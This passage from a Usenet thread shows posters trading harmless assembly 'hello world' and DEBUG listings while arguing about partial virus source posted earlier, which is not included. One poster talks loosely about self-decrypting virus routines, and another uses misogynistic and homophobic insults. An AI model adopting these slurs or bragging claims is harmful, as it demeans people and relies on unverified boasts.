    Dustin Guest

    G. Morgan <> wrote in
    news::

    > No biggie. You don't have to help - I took a chance even asking.


    Just use nasm. Copy my post source into notepad, be sure to save it as an
    ascii text! file.

    Make life easier for yourself.

     
    Dustin, Jul 28, 2012
    #13
  14. RayLopez99

    Dustin Guest

    Anonymous <> wrote in
    news::

    > In article <>
    > G. Morgan <> wrote:
    >>
    >> Dustin wrote:
    >>
    >> >Dustin <> wrote in
    >> >news:XnsA09DDA353D740HHI2948AJD832@no:
    >> >
    >> >> G. Morgan <> wrote in
    >> >> news::
    >> >>
    >> >>> Dustin wrote:
    >> >>>
    >> >>>>segment code
    >> >>>>
    >> >>>>start:
    >> >>>>mov ax,data
    >> >>>>mov ds,ax
    >> >>>>mov ax,stack
    >> >>>>mov ss,ax
    >> >>>>mov sp,stacktop
    >> >>>>
    >> >>>>mov dx,hello
    >> >>>>mov ah,9
    >> >>>>int 0x21
    >> >>>>
    >> >>>>mov ax,0x4c00
    >> >>>>int 0x21
    >> >>>>
    >> >>>>segment data
    >> >>>>
    >> >>>>hello: db 'hello, ****ing, world',13,10,'$'
    >> >>>>
    >> >>>>segment stack stack
    >> >>>>resb 64
    >> >>>>stacktop:
    >> >>>>
    >> >>>>
    >> >>>>Lemme know if you need it explained line by line too. [g]
    >> >>>>you can find nasm online for free.
    >> >>>
    >> >>> How do I manually assemble it with 'debug'?
    >> >>>
    >> >>>
    >> >>
    >> >> sigh
    >> >>
    >> >> convert my 0x to 21h and type each line one at a time...
    >> >> would just be easier if you assembled it with nasm...
    >> >> debug is a pain in the ass.
    >> >>
    >> >>
    >> >>
    >> >
    >> >I'm assuming you know how to enter assemble mode here with debug,
    >> >morgan. If you're being cheeky with me, I won't offer any more help
    >> >:)

    >>
    >>
    >> No, I'm serious. I opened a debug shell and tried to type (paste
    >> actually) the lines in. I got all errors. Then I did one at a
    >> time, typed, error each time. Then I tried the "assemble" command
    >> pointed to a file, didn't work. It's been a long time since I've
    >> done anything in 'debug', forgot it all! I didn't look it up at the
    >> time (still haven't) because I was watching the Olympics opening.
    >>
    >> No biggie. You don't have to help - I took a chance even asking.

    >
    > The sumbitch doesn't have a clue what he is doing. Without BASIC he's
    > dead. He's running a scam on you, and blaming the code failure on
    > you. -----BEGIN PGP SIGNATURE-----


    Code failure? No scam. That's piss simple assembler. The failure is
    indeed on Morgan's end. He doesn't know what he's doing and I've not been
    all that helpful.

    Speaking of basic, do you know what the source code I posted does? I
    haven't seen you comment offering to help Ray understand it better. ;p

    --
    Things look bad from over here. Too much confusion and no solution.
    Everyone here knows your fear. Your out of touch and you try too much.
    Yesterdays glory will help us today. You wanna retire? Get outta the
    way. I ain't got much time. Young ones close behind. I can't wait in
    line.
     
    Dustin, Jul 28, 2012
    #14
  15. RayLopez99

    Dustin Guest

    RayLopez99 <> wrote in
    news::

    > The poster that goes by "Dustin" in this group posted the below.
    > Don't know where he got it, probably cut and paste from somewhere,
    > but I'd thought it could be a good exercise to go through it, line by
    > line, and figure out what it does. I would appreciate any comments,
    > and I would cross-post this but Google Groups no longer supports that
    > feature.
    >
    > RL


    I forgot to ask... :) So pardon me for making yet another post! in this
    thread of yours...

    Do you really think anyones going to tell you what the code is doing?
    it's partial source to a known virus dude. A well known, potentially
    harmful virus. Nobodies going to help you get it up and running.

    Fact is, nobody besides me has the source code. Do you know why? Go
    ahead, try googling for irok v1.1c source files. You won't find them.

    C'mon Ray. You said you're a programmer (Well, you said coder first,
    but.. I digress).. We'll go with programmer... Why would I be the only
    person to have the source code?

    >> Again, the point of my exercise is to expose your ignorance to the
    >> world, not mine. Show us what you got. I never said 'fully
    >> functional'--I even said pseudocode is oK. Like the other poster
    >> said, do you even read your posts?


    as you don't require fully functional Ray, why the need for some
    specific subroutines I sorta, neglected to provide? [g]

    > PS--I challenge Dustin to show his 'mastery' of assembly by simply
    > posting here a simple subroutine in assembly that will display "FSCK
    > YOU" on the screen if a user runs the program. Simple enough, but if
    > Dustin is a cut-and-paste kiddie scripter as I suspect he is, he
    > won't find this on the net and will fail this simple test.


    You won't find the source of irok I posted here on the net, Ray. You can
    find assembler "hello world" programs online and even in books you can
    hold in your hand. Also in online help, tutes and many many text files
    covering a wide variety of assembler topics. From, writing legit apps,
    to writing viruses, malware, etc etc etc... cracks, keygens.. whatever
    you can think of.

    My assembler while written by me is nothing special. :) It's a simple
    int21h call to print to screen and another to exit back to console/dos.

    Funny you didn't even ask me to include that, but i'm so used to
    properly exiting, I do. ;p

    My other assembler program also prints hello ****ing world, but does so
    by decrypting and then jumping to another subroutine that's encrypted on
    disc. and remains encrypted on disc, but not in memory. The subroutine
    is an int21h call to print the contents of a memory location. Same thing
    the source I already posted is doing, it's just decrypting executable
    code and running it later. [g] In memory instead of on disc, as I
    typically did when using asic...

    in pseudo terms Ray...

    it modifies it's memory image and runs additional code you don't know is
    code in the executable. [g]

    Someone like Ant would know tho, he's an expert at disassembling. He'd
    know what I was up to, and since this code has no anti-debug tricks, he'd
    open it right up.

    And before you ask, I *won't* be sharing code like that with you, in any
    language. You can do it in asic too, my viruses all do. [g]

    It's one of the routines I left out. hehehehehehehe

    Honest reason being, you have no legitimate need to know how to do
    things like that. You can think I'm ducking out on it if you want, or
    being evasive.. but, in all actuality; I really can't ethically explain
    the details or provide functional source code that will do any of those
    functions so that you or someone else would understand it.

    If I do, I place my credits and access in serious jeopardy. You just
    don't understand the effort I put into it. It took me years to earn the
    respect of my peers from the av/am communities. They knew of my
    background in Vx, I had to prove myself. That I wasn't upto no good or
    setting anyone up. It's been 12 years, nothing malicious has been
    authored by me; nor have I helped anyone write malicious code.

    So, you can believe the anonymous remailer who thinks I only know basic
    and probably not even that.. OR! You can go with option 2, and believe
    Kurt and FromtheRafters oh, and me.

    One last comment, I worked for malwarebytes for two years. That's a long
    long time to bullshit people and get away with it. Especially technical
    people who expect you to study malware everyday, all day. People who,
    like me, know this shit. It was good money, but I earned every penny of
    it. [g]

    So think what you want, troll all you like. I am who I say I am, I have
    done what I've said I've done.

    --
    Things look bad from over here. Too much confusion and no solution.
    Everyone here knows your fear. Your out of touch and you try too much.
    Yesterdays glory will help us today. You wanna retire? Get outta the
    way. I ain't got much time. Young ones close behind. I can't wait in
    line.
     
    Dustin, Jul 28, 2012
    #15
  16. RayLopez99

    Dustin Guest

    "Ant" <> wrote in news:h5udnX-
    :

    > "G. Morgan" wrote:
    >
    >> How do I manually assemble it with 'debug'?

    >
    > a
    > mov dx,010c
    > mov ah,09
    > int 21
    > mov ax,4c00
    > int 21
    > db 42
    > db 6f
    > db 6f
    > db 21
    > db 24
    >
    > g
    >
    >
    >


    Ant. :) Why you... lol



    --
    Things look bad from over here. Too much confusion and no solution.
    Everyone here knows your fear. Your out of touch and you try too much.
    Yesterdays glory will help us today. You wanna retire? Get outta the
    way. I ain't got much time. Young ones close behind. I can't wait in
    line.
     
    Dustin, Jul 28, 2012
    #16
  17. RayLopez99

    Dustin Guest

    "Ant" <> wrote in news:h5udnX-
    :

    > "G. Morgan" wrote:
    >
    >> How do I manually assemble it with 'debug'?

    >
    > a
    > mov dx,010c
    > mov ah,09
    > int 21
    > mov ax,4c00
    > int 21
    > db 42
    > db 6f
    > db 6f
    > db 21
    > db 24
    >
    > g
    >
    >


    Cute message btw.. [g]


    --
    Things look bad from over here. Too much confusion and no solution.
    Everyone here knows your fear. Your out of touch and you try too much.
    Yesterdays glory will help us today. You wanna retire? Get outta the way.
    I ain't got much time. Young ones close behind. I can't wait in line.
     
    Dustin, Jul 28, 2012
    #17
  18. RayLopez99

    G. Morgan Guest

    Ant wrote:

    >"G. Morgan" wrote:
    >
    >> How do I manually assemble it with 'debug'?

    >
    >a
    >mov dx,010c
    >mov ah,09
    >int 21
    >mov ax,4c00
    >int 21
    >db 42
    >db 6f
    >db 6f
    >db 21
    >db 24
    >
    >g
    >


    Boo! <g>
     
    G. Morgan, Jul 28, 2012
    #18
  19. RayLopez99

    RayLopez99 Guest

    On Saturday, July 28, 2012 6:31:17 AM UTC-4, Ant wrote:
    > "G. Morgan" wrote:
    >
    > > How do I manually assemble it with 'debug'?
    >
    > a
    > mov dx,010c
    > mov ah,09
    > int 21
    > mov ax,4c00
    > int 21
    > db 42
    > db 6f
    > db 6f
    > db 21
    > db 24
    >
    > g


    // Dustin code

    segment code

    start:
    mov ax,data
    mov ds,ax
    mov ax,stack
    mov ss,ax
    mov sp,stacktop

    mov dx,hello
    mov ah,9
    int 0x21

    mov ax,0x4c00
    int 0x21

    segment data

    hello: db 'hello, ****ing, world',13,10,'$'

    segment stack stack
    resb 64
    stacktop:
    // end


    Ant, or Dustin: can you please go through this code line by line? I appreciate it. It's short enough that I think you can comment without too much effort.

    Thanks in advance. Seems Ant's code is more compact, whereas Dustin, as G. Morgan points out implicitly, may be faking it or taking shortcuts (not clear which as apparently it does not compile).

    I intend to use this for assembly programming (using Visual Studio): http://www.codeproject.com/Articles/271627/Assembly-Programming-with-Visual-Studio-2010

    RL
     
    RayLopez99, Jul 28, 2012
    #19
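    To make Ant's DEBUG listing concrete, here is an added worked example (not code from Ant, Dustin or anyone in the thread) that encodes the five instruction forms the script uses into the bytes DEBUG would emit, lays them out at offset 0100h the way DOS loads a .COM image, and reads back the '$'-terminated string that INT 21h/AH=09h would print from DS:DX. The opcodes are the documented 8086 encodings (B8+reg for mov r16,imm16, B0+reg for mov r8,imm8, CD ib for int); the function names and the embedded copy of the script are this example's own.

```python
"""Minimal encoder for the instruction forms in a DEBUG 'a' script.

Added example: assembles a DEBUG-style listing into a .COM image so the
byte layout is visible, and shows why `mov dx,010c` points exactly at
the string that the INT 21h/AH=09h call prints.  Only the forms used in
the script are supported (mov r16,imm16; mov r8,imm8; int imm8; db).
"""

import struct

COM_ORG = 0x100  # DOS loads a .COM file at offset 0100h; CS = DS = SS

# Constructed input: Ant's DEBUG script without the 'a' and 'g' commands.
# DEBUG treats every number as hex, with no 0x prefix or h suffix.
ANT_SCRIPT = """
mov dx,010c
mov ah,09
int 21
mov ax,4c00
int 21
db 42
db 6f
db 6f
db 21
db 24
"""

# 8086 short-form immediate moves: opcode = base + register number.
MOV_R16_IMM16 = {"ax": 0xB8, "cx": 0xB9, "dx": 0xBA, "bx": 0xBB}
MOV_R8_IMM8 = {"al": 0xB0, "cl": 0xB1, "dl": 0xB2, "bl": 0xB3,
               "ah": 0xB4, "ch": 0xB5, "dh": 0xB6, "bh": 0xB7}


def encode(line):
    """Return the machine-code bytes for one DEBUG-style source line."""
    mnemonic, _, rest = line.strip().partition(" ")
    operands = [o.strip().lower() for o in rest.split(",")]
    if mnemonic == "db":
        return bytes(int(x, 16) for x in operands)
    if mnemonic == "int":
        return b"\xcd" + bytes([int(operands[0], 16)])
    if mnemonic == "mov":
        reg, imm = operands[0], int(operands[1], 16)
        if reg in MOV_R16_IMM16:
            # 16-bit immediates are stored little-endian, hence "<H"
            return bytes([MOV_R16_IMM16[reg]]) + struct.pack("<H", imm)
        if reg in MOV_R8_IMM8:
            return bytes([MOV_R8_IMM8[reg], imm])
    raise ValueError(f"unsupported line: {line!r}")


def assemble(script):
    """Assemble a script; return (image bytes, [(offset, line, bytes), ...])."""
    image = bytearray()
    listing = []
    for line in script.strip().splitlines():
        code = encode(line)
        listing.append((COM_ORG + len(image), line.strip(), code))
        image += code
    return bytes(image), listing


def dollar_string_at(image, offset):
    """Read the '$'-terminated text that INT 21h/AH=09h prints from DS:DX."""
    start = offset - COM_ORG
    end = image.index(b"$", start)
    return image[start:end].decode("ascii")


def printed_message(image):
    """Follow the leading `mov dx,imm16` to the string the program prints."""
    if image[0] != MOV_R16_IMM16["dx"]:
        raise ValueError("image does not start with mov dx,imm16")
    (dx,) = struct.unpack_from("<H", image, 1)
    return dollar_string_at(image, dx)


if __name__ == "__main__":
    img, lst = assemble(ANT_SCRIPT)
    for off, src, code in lst:
        print(f"{off:04X}  {code.hex(' '):<10} {src}")
    print("prints:", printed_message(img))
```

    Running it shows that the five instructions occupy 0100h to 010Bh, so the first `db 42` ('B') lands at 010Ch and the message is "Boo!" followed by the '$' terminator; change any instruction length and the `mov dx` operand would have to move with it.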
  20. RayLopez99

    RayLopez99 Guest

    On Saturday, July 28, 2012 2:24:56 AM UTC-4, Dustin wrote:
    > I forgot to ask... :) So pardon me for making yet another post! in this
    > thread of yours...


    No problem Dustin, ask away. It seems to me you, unlike Ant, unlike Morgan, unlike me, unlike some others here, enjoy the "drama" or "human interest" aspect of this thread more than the technical part. That's fine, but it reminds me of a woman. She is more interested in such things as the color of a car rather than actually looking under the hood. It's OK though.


    > Do you really think anyones going to tell you what the code is doing?
    > it's partial source to a known virus dude. A well known, potentially
    > harmful virus. Nobodies going to help you get it up and running.


    ? I don't understand your assumptions. Perhaps you are projecting yours.

    > Fact is, nobody besides me has the source code. Do you know why? Go
    > ahead, try googling for irok v1.1c source files. You won't find them.
    >
    > C'mon Ray. You said you're a programmer (Well, you said coder first,
    > but.. I digress).. We'll go with programmer... Why would I be the only
    > person to have the source code?


    The only reasons would be that you intend to produce other viruses based on this source code, and you feel (a) the anti-virus companies could spot your new viruses easier if they had this source, or (b) more importantly, you don't want other virus writers easily replicating what you did if they had this source. But even those logical reasons are faulty, but I won't get into it here.

    > as you don't require fully functional Ray, why the need for some
    > specific subroutines I sorta, neglected to provide? [g]


    Because some interesting things are there. BTW, encryption as you mention in another post is rather routine in assembly, I found out Googling it.

    You wanna talk color Dustin? By all means my gay-ish friend. It's kind of fun sure and it's something you appear to excel in. You asked me about my age earlier and all I can say on that is that I'm probably younger than you.

    RL
     
    RayLopez99, Jul 28, 2012
    #20
